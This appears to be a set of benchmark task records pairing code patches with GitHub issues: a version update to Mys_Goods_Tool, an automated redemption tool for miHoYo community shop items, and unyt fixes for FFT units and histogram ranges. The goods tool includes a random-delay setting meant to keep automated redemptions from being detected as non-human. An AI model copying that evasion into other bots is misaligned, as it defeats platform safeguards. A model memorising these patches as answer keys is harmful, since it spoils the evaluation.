):
"""
- :param game_info: 商品频道数据
+ :param partition: (商品分区, 字母简称) 数据
:param tap_pane: 频道对应的 `TabPane` 标签页
:param good_list: 商品数据
:param button_select: 选择商品的按钮
"""
- self.game_info = game_info
+ name, abbr = partition
+ self.partition = partition
"""商品频道数据"""
self.button_select = button_select or GameButton(
"💾 确定",
- id=f"button-goods-select-{game_info.id}",
+ id=f"button-goods-select-{abbr}",
disabled=True,
- game=game_info)
+ partition=partition)
"""选择商品的按钮"""
self.option_list = OptionList(GoodsContent.empty_data_option, disabled=True)
"""商品的选项列表"""
- self.tap_pane = tap_pane or TabPane(game_info.name, Horizontal(self.button_select, self.option_list))
+ self.tap_pane = tap_pane or TabPane(name, Horizontal(self.button_select, self.option_list))
"""频道对应的 `TabPane` 标签页"""
self.good_list = good_list
"""商品数据"""
@@ -300,13 +301,14 @@ async def update_data(self):
self.button_refresh.disable()
for goods_data in self.good_dict.values():
- good_list_status, good_list = await get_good_list(goods_data.game_info.op_name)
+ name, abbr = goods_data.partition
+ good_list_status, good_list = await get_good_list(abbr)
good_list = list(filter(lambda x: x.is_time_limited() and not x.is_time_end(), good_list))
# 一种情况是获取成功但返回的商品数据为空,一种是API请求失败
goods_data.option_list.clear_options()
if not good_list_status:
- self.app.notice(f"[bold red]获取频道 [bold red]{goods_data.game_info.name}[/] 的商品数据失败![/]")
+ self.app.notice(f"[bold red]获取频道 [bold red]{name}[/] 的商品数据失败![/]")
# TODO 待补充各种错误情况
if good_list:
goods_data.good_list = good_list
@@ -331,13 +333,15 @@ async def _on_mount(self, _: events.Mount):
self.loading.show()
# 更新商品频道列表
- game_list_status, game_list = await get_game_list()
- if game_list_status:
- for game in game_list:
- if game.id not in self.good_dict:
+ partition_status, partition_all = await get_good_games()
+ # 过滤掉 "全部" 分区
+ partitions = filter(lambda x: x[1] != "all", partition_all)
+ if partition_status:
+ for name, abbr in partitions:
+ if abbr not in self.good_dict:
# 如果没有商品频道对应值,则进行创建
- goods_data = self.GoodsDictValue(game)
- self.good_dict.setdefault(game.id, goods_data)
+ goods_data = self.GoodsDictValue((name, abbr))
+ self.good_dict.setdefault(abbr, goods_data)
await self.tabbed_content.append(goods_data.tap_pane)
# 更新每个频道的商品数据
@@ -377,22 +381,19 @@ async def _on_button_pressed(self, event: GameButton.Pressed) -> None:
if event.button.id.startswith("button-goods-select"):
# 按下“保存”按钮时触发的事件
- game = event.button.game
- if not game:
- self.app.notice("[bold red]未找到对应的频道数据或频道不可用[/]")
- return
- option_list = self.good_dict[game.id].option_list
+ name, abbr = event.button.partition
+ option_list = self.good_dict[abbr].option_list
selected_index = option_list.highlighted
if selected_index is None:
self.app.notice("[bold red]请先从列表中选择商品![/]")
return
- good_dict_value = self.good_dict.get(game.id)
+ good_dict_value = self.good_dict.get(abbr)
if not good_dict_value:
self.app.notice("[bold red]未找到对应的频道[/]")
return
good = good_dict_value.good_list[selected_index]
- GoodsContent.selected_tuple = game, selected_index
+ GoodsContent.selected_tuple = name, abbr, selected_index
# 获取商品详情
self.loading.show()
@@ -421,7 +422,7 @@ async def _on_button_pressed(self, event: GameButton.Pressed) -> None:
self.text_view.update(f"已选择商品:"
f"\n[list]"
- f"\n🗂️ 商品频道:[bold green]{game.name}[/]"
+ f"\n🗂️ 商品频道:[bold green]{name}[/]"
f"\n📌 名称:[bold green]{good.general_name}[/]"
f"\n💰 价格:[bold green]{good.price}[/] 米游币"
f"\n📦 库存:[bold green]{good.stoke_text}[/] 件"
diff --git a/mys_goods_tool/login_view.py b/mys_goods_tool/login_view.py
index d241bfdc..7d64a487 100644
--- a/mys_goods_tool/login_view.py
+++ b/mys_goods_tool/login_view.py
@@ -54,53 +54,6 @@ class CaptchaLoginInformation(Container):
}
"""
- class Tips(Container):
- """
- 登陆信息面板文本视图
- """
- DEFAULT_CSS = """
- Tips {
- height: 100%;
- width: 1fr;
- align: right middle;
- padding: 1;
- overflow: auto;
- border: round #666;
- }
-
- App.-light-mode Tips {
- border: round #CCC;
- }
-
- Tips StaticStatus {
- width: 100%;
- align: center top;
- text-align: center;
- }
- """
-
- class StepSet(Container):
- """
- 登陆进度节点集合视图
- """
- DEFAULT_CSS = """
- StepSet {
- height: auto;
- width: 1fr;
- align: left middle;
- overflow: auto;
- border: round #666;
- }
-
- App.-light-mode StepSet {
- border: round #CCC;
- }
-
- StepSet RadioStatus {
- margin: 1 1;
- }
- """
-
RadioTuple = NamedTuple("RadioTuple",
create_geetest=RadioStatus,
http_server=RadioStatus,
@@ -140,8 +93,8 @@ class StepSet(Container):
geetest_text=StaticStatus(GEETEST_TEXT)
)
- radio_set = StepSet(*radio_tuple)
- static_set = Tips(*static_tuple)
+ radio_set = CaptchaStepSet(*radio_tuple)
+ static_set = CaptchaTips(*static_tuple)
def compose(self) -> ComposeResult:
yield Horizontal(self.radio_set, self.static_set)
diff --git a/mys_goods_tool/tui.py b/mys_goods_tool/tui.py
index c5d94cd2..0f09ea58 100644
--- a/mys_goods_tool/tui.py
+++ b/mys_goods_tool/tui.py
@@ -27,8 +27,15 @@
from mys_goods_tool.utils import LOG_FORMAT, logger
WELCOME_MD = """
+# Mys_Goods_Tool - 米游社商品兑换工具
+
+## 更新说明
+- 修复米游社(大别野)等商品分区无商品的问题
+- 修复图形界面兑换模式下不会执行兑换的问题
+
## 功能和特性
-- 使用 Textual 终端图形界面库,支持 Windows / Linux / macOS 甚至可能是移动端SSH客户端
+
+- 使用 [Textual](https://github.com/Textualize/textual) 终端图形界面库,支持 Windows / Linux / macOS 甚至可能是移动端SSH客户端
- 短信验证码登录(只需接收一次验证码)
- 内置人机验证页面,无需前往官网验证
- 多账号支持
@@ -37,22 +44,21 @@
### TODO
- 支持在图形界面中编辑偏好设置
- 密码登录
-
-## 偏好设置
-默认配置下基本上可以正常使用,如果需要修改配置,可以参考 [`mys_goods_tool/user_data.py`]() 进行配置。
-
-默认配置文件路径为 `./user_data.json`,可以通过 `-c` 或 `--conf` 参数指定配置文件路径。
+- 解决SSH客户端无法跳转人机验证链接的问题
+- 更新至极验第四代适应性验证
## 其他
+- [**🔗完整说明文档**](https://github.com/Ljzd-PRO/Mys_Goods_Tool/wiki)
- 仅供学习时参考
- 相似项目推荐: \
-**mysTool - 米游社辅助工具插件** \
-简介:NoneBot2 插件 | 米游社工具-每日米游币任务、游戏签到、商品兑换、免抓包登录、原神树脂提醒 \
-🔗 https://github.com/Ljzd-PRO/nonebot-plugin-mystool
-
+ **mysTool - 米游社辅助工具插件** \
+ 简介:NoneBot2 插件 | 米游社工具-每日米游币任务、游戏签到、商品兑换、免抓包登录、原神树脂提醒 \
+ 🔗 https://github.com/Ljzd-PRO/nonebot-plugin-mystool
+
- 本项目已开启[🔗Github Actions](https://github.com/Ljzd-PRO/Mys_Goods_Tool/actions)。
-欢迎[🔗指出Bug](https://github.com/Ljzd-PRO/Mys_Goods_Tool/issues)和[🔗贡献代码](https://github.com/Ljzd-PRO/Mys_Goods_Tool/pulls)👏
+ 欢迎[🔗指出Bug](https://github.com/Ljzd-PRO/Mys_Goods_Tool/issues)
+ 和[🔗贡献代码](https://github.com/Ljzd-PRO/Mys_Goods_Tool/pulls)👏
- 开发版分支:[🔗dev](https://github.com/Ljzd-PRO/Mys_Goods_Tool/tree/dev/)
"""
diff --git a/mys_goods_tool/user_data.py b/mys_goods_tool/user_data.py
index c4c59e94..185c82c3 100644
--- a/mys_goods_tool/user_data.py
+++ b/mys_goods_tool/user_data.py
@@ -1,5 +1,4 @@
import os
-import traceback
from json import JSONDecodeError
from pathlib import Path
from typing import List, Union, Optional, Tuple, Any, Dict, Set, Callable, TYPE_CHECKING, AbstractSet, \
@@ -17,7 +16,7 @@
CONFIG_PATH = ROOT_PATH / "user_data.json"
"""用户数据文件默认路径"""
-VERSION = "2.0.0"
+VERSION = "2.0.1"
"""程序当前版本"""
if TYPE_CHECKING:
@@ -296,7 +295,7 @@ class Preference(BaseSettings):
"""登录时使用的 GEETEST行为验证 WEB服务 本地监听地址"""
exchange_thread_count: int = 2
"""兑换线程数"""
- exchange_latency: Tuple[float, float] = (0, 0.35)
+ exchange_latency: Tuple[float, float] = (0, 0.2)
"""兑换时间延迟随机范围(单位:秒)(防止因为发出请求的时间过于精准而被服务器认定为非人工操作)"""
enable_log_output: bool = True
"""是否保存日志"""
@@ -483,20 +482,17 @@ def load_config():
try:
return UserData.parse_file(CONFIG_PATH)
except (ValidationError, JSONDecodeError):
- logger.error(f"读取用户数据文件失败,请检查用户数据文件 {CONFIG_PATH} 格式是否正确")
- logger.debug(traceback.format_exc())
+ logger.exception(f"读取用户数据文件失败,请检查用户数据文件 {CONFIG_PATH} 格式是否正确")
exit(1)
except:
- logger.error(f"读取用户数据文件失败,请检查用户数据文件 {CONFIG_PATH} 是否存在且程序有权限读取和写入")
- logger.debug(traceback.format_exc())
+ logger.exception(f"读取用户数据文件失败,请检查用户数据文件 {CONFIG_PATH} 是否存在且程序有权限读取和写入")
exit(1)
else:
user_data = UserData()
try:
write_config_file(user_data)
except PermissionError:
- logger.error(f"创建用户数据文件失败,请检查程序是否有权限读取和写入 {CONFIG_PATH}")
- logger.debug(traceback.format_exc())
+ logger.exception(f"创建用户数据文件失败,请检查程序是否有权限读取和写入 {CONFIG_PATH}")
exit(1)
# logger.info(f"用户数据文件 {CONFIG_PATH} 不存在,已创建默认用户数据文件。")
# 由于会输出到标准输出流,影响TUI观感,因此暂时取消
diff --git a/pyproject.toml b/pyproject.toml
index 5fa55e8c..affedea6 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
[tool.poetry]
name = "mys-goods-tool"
-version = "2.0.0"
+version = "2.0.1"
description = "米游社商品兑换工具|短信验证登录|终端TUI界面"
authors = ["Ljzd-PRO <[email protected]>"]
readme = "README.md"
@@ -23,14 +23,14 @@ packages = [{ include = "mys_goods_tool" }]
[tool.poetry.dependencies]
python = ">=3.9,<3.12"
tenacity = "^8.2.2"
-requests = "^2.29.0"
+requests = "^2.30.0"
ping3 = "^4.0.4"
ntplib = "^0.4.0"
pydantic = "^1.10.6"
loguru = "^0.7.0"
httpx = "^0.24.0"
rich = "^13.3.5"
-textual = "^0.23.0"
+textual = "^0.24.1"
socksio = "^1.0.0"
apscheduler = "^3.10.1"
diff --git a/requirements.txt b/requirements.txt
index 7bbf6a24..0830a616 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -2,14 +2,14 @@
## main.dependencies
tenacity~=8.2.2
-requests~=2.29.0
+requests~=2.30.0
ping3~=4.0.4
ntplib~=0.4.0
pydantic~=1.10.6
loguru~=0.7.0
httpx~=0.24.0
rich~=13.3.5
-textual~=0.23.0
+textual~=0.24.1
socksio~=1.0.0
apscheduler~=3.10.1
Packaged binary errors on Ubuntu; how can a pip install share the json; how to keep the process in the background over SSH
First of all, thank you very much for this project. I didn't expect it to already have a graphical interface, that's impressive!
I tried it on Windows and everything seems fine; the questions below come from running it on an Ubuntu server.
System:
```
(mys) root@iZ0jlfdhubp6dlnrp6szdvZ:~/mys/dist# lsb_release -a
LSB Version: core-11.1.0ubuntu2-noarch:security-11.1.0ubuntu2-noarch
Distributor ID: Ubuntu
Description: Ubuntu 20.04.5 LTS
Release: 20.04
Codename: focal
(mys) root@iZ0jlfdhubp6dlnrp6szdvZ:~/mys/dist# python -V
Python 3.9.16
```
### Packaged binary errors on Ubuntu
I extracted the latest build from GitHub Actions
```
(mys) root@iZ0jlfdhubp6dlnrp6szdvZ:~/mys# tree
.
├── dist
│ └── Mys_Goods_Tool
├── Mys_Goods_Tool_v2-Linux-x86_64.zip
└── README.md
(mys) root@iZ0jlfdhubp6dlnrp6szdvZ:~/mys# cd dist/
(mys) root@iZ0jlfdhubp6dlnrp6szdvZ:~/mys/dist# ./Mys_Goods_Tool
[3980] Error loading Python lib '/tmp/_MEIXadoU3/libpython3.11.so.1.0': dlopen: /lib/x86_64-linux-gnu/libm.so.6: version `GLIBC_2.35' not found (required by /tmp/_MEIXadoU3/libpython3.11.so.1.0)
```
From a quick look, this seems to be a version incompatibility problem
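As context for the loader error above: the `GLIBC_2.35` symbol requirement comes from the machine the bundle was built on, while Ubuntu 20.04 (focal) ships glibc 2.31, so the bundled `libpython` cannot load. A small illustrative check of the local libc version (added for context, not part of the original report):

```python
import platform

# platform.libc_ver() probes the C library the running interpreter is
# linked against; on Ubuntu 20.04 it reports glibc 2.31, which is older
# than the GLIBC_2.35 the PyInstaller bundle requires.
name, version = platform.libc_ver()
print(name, version)
```

Building the bundle on an OS no newer than the deployment target (or installing via pip, which works fine as noted below) sidesteps the mismatch.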
### How can a pip install share the json
Installing via pip runs fine, but I'd like to ask how to share the json (I already set everything up on Windows and have a user_data.json there, so I'd like to save myself the effort).
### How to keep the process in the background over an SSH connection
Also, how do I keep the process running in the background? I tried tmux and screen, but there seems to be some conflict that makes mouse clicks stop working.
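A likely explanation for the unclickable mouse (a hedged suggestion, not part of the original report): tmux only forwards mouse events to the application inside it when its own mouse mode is enabled. Assuming tmux >= 2.1, a one-line `~/.tmux.conf` entry turns it on:

```shell
# ~/.tmux.conf: forward mouse clicks and scrolling to programs running inside tmux
set -g mouse on
```

Reload with `tmux source-file ~/.tmux.conf` and reattach; Textual-based TUIs should then receive clicks.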
Follow up to GEETEST 4th-generation behavioral verification
No Dabieye (大别野) goods in the goods exchange
Hi, I can see goods exchange entries for Genshin Impact and Honkai: Star Rail, but Dabieye (大别野) goods never show up after refreshing (I confirmed in the app that goods exist and that my channel level qualifies for the exchange). Is this feature unimplemented, or is there a problem in the program?
| 2023-05-10T14:13:00 | 0.0 | [] | [] |
|||
yt-project/unyt | yt-project__unyt-531 | 55f1ac47b7adb967c14981029633bd5d16d1a7aa | diff --git a/unyt/_array_functions.py b/unyt/_array_functions.py
index 4b22dd20..646629e2 100644
--- a/unyt/_array_functions.py
+++ b/unyt/_array_functions.py
@@ -358,72 +358,72 @@ def block(arrays):
@implements(np.fft.fft)
def ftt_fft(a, *args, **kwargs):
- return np.fft.fft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.fft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.fft2)
def ftt_fft2(a, *args, **kwargs):
- return np.fft.fft2._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.fft2._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.fftn)
def ftt_fftn(a, *args, **kwargs):
- return np.fft.fftn._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.fftn._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.hfft)
def ftt_hfft(a, *args, **kwargs):
- return np.fft.hfft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.hfft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.rfft)
def ftt_rfft(a, *args, **kwargs):
- return np.fft.rfft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.rfft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.rfft2)
def ftt_rfft2(a, *args, **kwargs):
- return np.fft.rfft2._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.rfft2._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.rfftn)
def ftt_rfftn(a, *args, **kwargs):
- return np.fft.rfftn._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.rfftn._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.ifft)
def ftt_ifft(a, *args, **kwargs):
- return np.fft.ifft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.ifft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.ifft2)
def ftt_ifft2(a, *args, **kwargs):
- return np.fft.ifft2._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.ifft2._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.ifftn)
def ftt_ifftn(a, *args, **kwargs):
- return np.fft.ifftn._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.ifftn._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.ihfft)
def ftt_ihfft(a, *args, **kwargs):
- return np.fft.ihfft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.ihfft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.irfft)
def ftt_irfft(a, *args, **kwargs):
- return np.fft.irfft._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.irfft._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.irfft2)
def ftt_irfft2(a, *args, **kwargs):
- return np.fft.irfft2._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.irfft2._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.irfftn)
def ftt_irfftn(a, *args, **kwargs):
- return np.fft.irfftn._implementation(np.asarray(a), *args, **kwargs) / a.units
+ return np.fft.irfftn._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.fft.fftshift)
| unyt processes units for FFTs incorrectly
* unyt version: 3.0.3
* Python version: 3.12
* Operating System: MacOS
### Description
When using a fast Fourier transform, I expect the units that are returned to be the same as the original function. Dimensionally, the Fourier transform ($`F(k)`$) is a decomposition of the form:
$$f(x) ~= \int F(k) e^{-ikx} \cdot dk$$
However, when using the `np.fft` functions on `unyt` arrays, they return units that are the inverse of the original array's units.
For example, the minimal working example below:
```python
import matplotlib.pyplot as plt
import unyt
import numpy as np
# Dirac Delta
x = unyt.unyt_array(np.linspace(-5, 5, 128), "s", name="Time")
y = unyt.unyt_array(np.zeros_like(x.v), "K", name="Temperature")
y[len(y) // 2] = 1
# FFT that thing
fft = np.fft.fft(y)
amps = np.sqrt((fft * fft.conj()).real)
dk = 2.0 * np.pi / (10.0 * unyt.s)
k = np.fft.fftfreq(len(x), d=1.0 / dk) * len(x)
k.name = "Wavenumber $k$"
amps.name = "FFT of Temperature"
# Plot it up
with unyt.matplotlib_support:
fig, (axreal, axfft) = plt.subplots(1, 2, figsize=(6, 2.5))
axreal.plot(x, y)
axfft.plot(k, amps)
fig.tight_layout()
plt.show()
```
This produces the following figure:
<img width="879" alt="Screenshot 2024-10-25 at 8 20 19 AM" src="https://github.com/user-attachments/assets/f424a07f-2a50-41b7-996e-164781532950">
edit by @neutrinoceros: fixed latex formatting
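The expected behavior also follows from the discrete transform numpy actually computes: it is a plain weighted sum with no $dx$ or $dk$ measure attached, so the output must carry the same units as the input (this dimensional note is added for context and is not part of the original report):

```latex
A_k \;=\; \sum_{m=0}^{n-1} a_m \, e^{-2\pi i\, mk/n}
\qquad \Longrightarrow \qquad [A_k] = [a_m] = \mathrm{K}
```

which is exactly why a `K`-valued input should give a `K`-valued spectrum rather than `1/K`.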
| oof. Thanks for catching this. That's a two y.o. mistake I made in https://github.com/yt-project/unyt/pull/313
It should be pretty straightforward to fix though, once you know where to look (and the affected code is pretty much self-contained in #313). Are you interested in giving it a go yourself?
Yes, I can take a look. For sanity's sake, I just checked all this with astropy, which gives the correct units:
```python
import matplotlib.pyplot as plt
from astropy.visualization import quantity_support
import astropy.units as u
import numpy as np
quantity_support()
# Dirac Delta
x = np.linspace(-5, 5, 128) * u.s
y = np.zeros_like(x.value) * u.K
y[len(y) // 2] = 1 * u.K
# FFT that thing
fft = np.fft.fft(y)
amps = np.sqrt((fft * fft.conj()).real)
dk = 2.0 * np.pi / (10.0 * u.s)
k = np.fft.fftfreq(len(x), d=1.0 / dk) * len(x)
# Plot it up
fig, (axreal, axfft) = plt.subplots(1, 2, figsize=(6, 2.5))
axreal.plot(x, y)
axfft.plot(k, amps)
fig.tight_layout()
plt.show()
```
<img width="594" alt="Screenshot 2024-10-25 at 9 10 42 AM" src="https://github.com/user-attachments/assets/3ede0992-b7eb-4736-8239-4c2a77a7cda9">
(yes, I also had a look at how astropy does it before I applied the "bug" label, to make sure I didn't just copy a bug from there and make my *own* mistakes :) ) | 2024-10-25T13:56:11 | 0.0 | [] | [] |
||
yt-project/unyt | yt-project__unyt-466 | bba2d872241886b56d22eb1dc338cb62c214b019 | diff --git a/unyt/_array_functions.py b/unyt/_array_functions.py
index ded81b49..e288d27e 100644
--- a/unyt/_array_functions.py
+++ b/unyt/_array_functions.py
@@ -146,9 +146,16 @@ def _sanitize_range(_range, units):
ilim = _range[2 * i : 2 * (i + 1)]
imin, imax = ilim
if not (hasattr(imin, "units") and hasattr(imax, "units")):
- raise TypeError(
- f"Elements of range must both have a 'units' attribute. Got {_range}"
- )
+ if len(units) == 1:
+ # allow range to be pure numerical scalars
+ # for backward compatibility with unyt 2.9.5
+ # see https://github.com/yt-project/unyt/issues/465
+ imin *= units[0]
+ imax *= units[0]
+ else:
+ raise TypeError(
+ f"Elements of range must both have a 'units' attribute. Got {_range}"
+ )
new_range[i] = imin.to_value(units[i]), imax.to_value(units[i])
return new_range.squeeze()
| BUG: (NEP 18) np.histogram raises TypeError for range using implicit units
* unyt version: 3.0.0
* Python version: any
* Operating System: any
### Description
This is a regression in unyt 3.0.0, discovered in testing yt's cookbook.
### What I Did
```python
import unyt as un
import numpy as np
np.histogram(
un.unyt_array([0, 1, 2, 3], 'yr'),
bins=2,
range=[0, 5e8], # years
)
```
```
Traceback (most recent call last):
File "/Users/robcleme/dev/yt-project/yt/g.py", line 4, in <module>
np.histogram(
File "/Users/robcleme/dev/yt-project/yt/_unyt/unyt/array.py", line 2034, in __array_function__
return _HANDLED_FUNCTIONS[func](*args, **kwargs)
File "/Users/robcleme/dev/yt-project/yt/_unyt/unyt/_array_functions.py", line 164, in histogram
range = _sanitize_range(range, units=[a.units])
File "/Users/robcleme/dev/yt-project/yt/_unyt/unyt/_array_functions.py", line 149, in _sanitize_range
raise TypeError(
TypeError: Elements of range must both have a 'units' attribute. Got [0, 500000000.0]
```
The error message, which is 100% intentional, hints at the preferred way to call this function by making units explicit:
```python
import unyt as un
import numpy as np
np.histogram(
un.unyt_array([0, 1, 2, 3], 'yr'),
bins=2,
range=un.unyt_array([0, 5e8], 'yr'),
)
```
however, this doesn't work with unyt 2.9.5.
The only way to write this code that's portable against unyt 2.9.5 and unyt 3.0.0 is to strip units, which is less than ideal. In hindsight, I think it should still be allowed to use implicit units for the range argument here. I'll try to come up with a non-invasive fix.
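For reference, the unit-stripping pattern mentioned above can be sketched so it behaves identically under unyt 2.9.5 and 3.0.0; a plain ndarray stands in for `a.to_value('yr')` here so the snippet runs without unyt installed:

```python
import numpy as np

# Stand-in for a.to_value("yr") on a unyt_array holding values in years.
a_values = np.asarray([0.0, 1.0, 2.0, 3.0])

# Once the array itself is unitless, a plain-number range is accepted by
# both unyt versions; units can be reattached to `edges` afterwards.
counts, edges = np.histogram(a_values, bins=2, range=[0.0, 5e8])
print(counts, edges)  # counts sum to 4; edges run from 0 to 5e8
```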
| 2023-11-02T10:23:03 | 0.0 | [] | [] |
|||
yt-project/unyt | yt-project__unyt-464 | becb26d12ee11bb1af74790c1433b056ad7f89f8 | diff --git a/unyt/_array_functions.py b/unyt/_array_functions.py
index 85edd6a1..01e163b8 100644
--- a/unyt/_array_functions.py
+++ b/unyt/_array_functions.py
@@ -68,10 +68,8 @@ def array2string(a, *args, **kwargs):
def product_helper(a, b, out, func):
prod_units = getattr(a, "units", NULL_UNIT) * getattr(b, "units", NULL_UNIT)
if out is None:
- return func._implementation(a.view(np.ndarray), b.view(np.ndarray)) * prod_units
- res = func._implementation(
- a.view(np.ndarray), b.view(np.ndarray), out=out.view(np.ndarray)
- )
+ return func._implementation(np.asarray(a), np.asarray(b)) * prod_units
+ res = func._implementation(np.asarray(a), np.asarray(b), out=np.asarray(out))
if getattr(out, "units", None) is not None:
out.units = prod_units
return unyt_array(res, prod_units, bypass_validation=True)
@@ -84,14 +82,14 @@ def dot(a, b, out=None):
@implements(np.vdot)
def vdot(a, b):
- return np.vdot._implementation(a.view(np.ndarray), b.view(np.ndarray)) * (
+ return np.vdot._implementation(np.asarray(a), np.asarray(b)) * (
getattr(a, "units", NULL_UNIT) * getattr(b, "units", NULL_UNIT)
)
@implements(np.inner)
def inner(a, b):
- return np.inner._implementation(a.view(np.ndarray), b.view(np.ndarray)) * (
+ return np.inner._implementation(np.asarray(a), np.asarray(b)) * (
getattr(a, "units", NULL_UNIT) * getattr(b, "units", NULL_UNIT)
)
@@ -103,14 +101,14 @@ def outer(a, b, out=None):
@implements(np.kron)
def kron(a, b):
- return np.kron._implementation(a.view(np.ndarray), b.view(np.ndarray)) * (
+ return np.kron._implementation(np.asarray(a), np.asarray(b)) * (
getattr(a, "units", NULL_UNIT) * getattr(b, "units", NULL_UNIT)
)
@implements(np.linalg.inv)
def linalg_inv(a, *args, **kwargs):
- return np.linalg.inv._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.linalg.inv._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.linalg.tensorinv)
@@ -127,7 +125,7 @@ def linalg_pinv(a, *args, **kwargs):
def linalg_svd(a, full_matrices=True, compute_uv=True, *args, **kwargs):
ret_units = a.units
retv = np.linalg.svd._implementation(
- a.view(np.ndarray), full_matrices, compute_uv, *args, **kwargs
+ np.asarray(a), full_matrices, compute_uv, *args, **kwargs
)
if compute_uv:
u, s, vh = retv
@@ -170,7 +168,7 @@ def histogram(
):
range = _sanitize_range(range, units=[a.units])
counts, bins = np.histogram._implementation(
- a.view(np.ndarray), bins, range, *args, **kwargs
+ np.asarray(a), bins, range, *args, **kwargs
)
return counts, bins * a.units
@@ -179,7 +177,7 @@ def histogram(
def histogram2d(x, y, bins=10, range=None, *args, **kwargs):
range = _sanitize_range(range, units=[x.units, y.units])
counts, xbins, ybins = np.histogram2d._implementation(
- x.view(np.ndarray), y.view(np.ndarray), bins, range, *args, **kwargs
+ np.asarray(x), np.asarray(y), bins, range, *args, **kwargs
)
return counts, xbins * x.units, ybins * y.units
@@ -189,7 +187,7 @@ def histogramdd(sample, bins=10, range=None, *args, **kwargs):
units = [_.units for _ in sample]
range = _sanitize_range(range, units=units)
counts, bins = np.histogramdd._implementation(
- [_.view(np.ndarray) for _ in sample], bins, range, *args, **kwargs
+ [np.asarray(_) for _ in sample], bins, range, *args, **kwargs
)
return counts, tuple(_bin * u for _bin, u in zip(bins, units))
@@ -197,8 +195,7 @@ def histogramdd(sample, bins=10, range=None, *args, **kwargs):
@implements(np.histogram_bin_edges)
def histogram_bin_edges(a, *args, **kwargs):
return (
- np.histogram_bin_edges._implementation(a.view(np.ndarray), *args, **kwargs)
- * a.units
+ np.histogram_bin_edges._implementation(np.asarray(a), *args, **kwargs) * a.units
)
@@ -247,12 +244,12 @@ def concatenate(arrs, /, axis=0, out=None, *args, **kwargs):
ret_units = _validate_units_consistency(arrs)
if out is not None:
- out_view = out.view(np.ndarray)
+ out_view = np.asarray(out)
else:
out_view = out
res = np.concatenate._implementation(
- [_.view(np.ndarray) for _ in arrs], axis, out_view, *args, **kwargs
+ [np.asarray(_) for _ in arrs], axis, out_view, *args, **kwargs
)
if getattr(out, "units", None) is not None:
@@ -265,9 +262,7 @@ def concatenate(arrs, /, axis=0, out=None, *args, **kwargs):
def cross(a, b, *args, **kwargs):
prod_units = getattr(a, "units", NULL_UNIT) * getattr(b, "units", NULL_UNIT)
return (
- np.cross._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
- )
+ np.cross._implementation(np.asarray(a), np.asarray(b), *args, **kwargs)
* prod_units
)
@@ -276,8 +271,8 @@ def cross(a, b, *args, **kwargs):
def intersect1d(arr1, arr2, /, assume_unique=False, return_indices=False):
_validate_units_consistency((arr1, arr2))
retv = np.intersect1d._implementation(
- arr1.view(np.ndarray),
- arr2.view(np.ndarray),
+ np.asarray(arr1),
+ np.asarray(arr2),
assume_unique=assume_unique,
return_indices=return_indices,
)
@@ -290,41 +285,36 @@ def intersect1d(arr1, arr2, /, assume_unique=False, return_indices=False):
@implements(np.union1d)
def union1d(arr1, arr2, /):
_validate_units_consistency((arr1, arr2))
- return (
- np.union1d._implementation(arr1.view(np.ndarray), arr2.view(np.ndarray))
- * arr1.units
- )
+ return np.union1d._implementation(np.asarray(arr1), np.asarray(arr2)) * arr1.units
@implements(np.linalg.norm)
def norm(x, /, *args, **kwargs):
- return np.linalg.norm._implementation(x.view(np.ndarray), *args, **kwargs) * x.units
+ return np.linalg.norm._implementation(np.asarray(x), *args, **kwargs) * x.units
@implements(np.vstack)
def vstack(tup, /):
ret_units = _validate_units_consistency(tup)
- return np.vstack._implementation([_.view(np.ndarray) for _ in tup]) * ret_units
+ return np.vstack._implementation([np.asarray(_) for _ in tup]) * ret_units
@implements(np.hstack)
def hstack(tup, /):
ret_units = _validate_units_consistency(tup)
- return np.vstack._implementation([_.view(np.ndarray) for _ in tup]) * ret_units
+ return np.vstack._implementation([np.asarray(_) for _ in tup]) * ret_units
@implements(np.dstack)
def dstack(tup, /):
ret_units = _validate_units_consistency(tup)
- return np.dstack._implementation([_.view(np.ndarray) for _ in tup]) * ret_units
+ return np.dstack._implementation([np.asarray(_) for _ in tup]) * ret_units
@implements(np.column_stack)
def column_stack(tup, /):
ret_units = _validate_units_consistency(tup)
- return (
- np.column_stack._implementation([_.view(np.ndarray) for _ in tup]) * ret_units
- )
+ return np.column_stack._implementation([np.asarray(_) for _ in tup]) * ret_units
@implements(np.stack)
@@ -332,11 +322,11 @@ def stack(arrays, /, axis=0, out=None):
ret_units = _validate_units_consistency(arrays)
if out is None:
return (
- np.stack._implementation([_.view(np.ndarray) for _ in arrays], axis=axis)
+ np.stack._implementation([np.asarray(_) for _ in arrays], axis=axis)
* ret_units
)
res = np.stack._implementation(
